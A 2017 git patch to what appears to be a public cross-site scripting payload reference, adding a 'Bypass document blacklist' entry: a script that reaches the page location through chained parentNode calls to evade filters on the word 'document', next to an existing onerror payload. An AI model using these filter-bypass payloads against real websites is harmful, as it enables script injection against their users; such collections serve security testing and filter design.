From eecfc69c0869447d74994e17a931f96a97d66982 Mon Sep 17 00:00:00 2001
From: Swissky <maxropelewski@gmail.com>
Date: Thu, 2 Mar 2017 17:39:15 +0100
Subject: [PATCH] XSS Payload - bypass document blacklisted keyword

---
 XSS injection/README.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/XSS injection/README.md b/XSS injection/README.md
index a2c729f..cd5ccc9 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -422,6 +422,10 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
 <img src='1' onerror='alert(0)' <
 ```
 
+Bypass document blacklist
+```
+<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
+```
 
 Bypass using javascript inside a string
 ```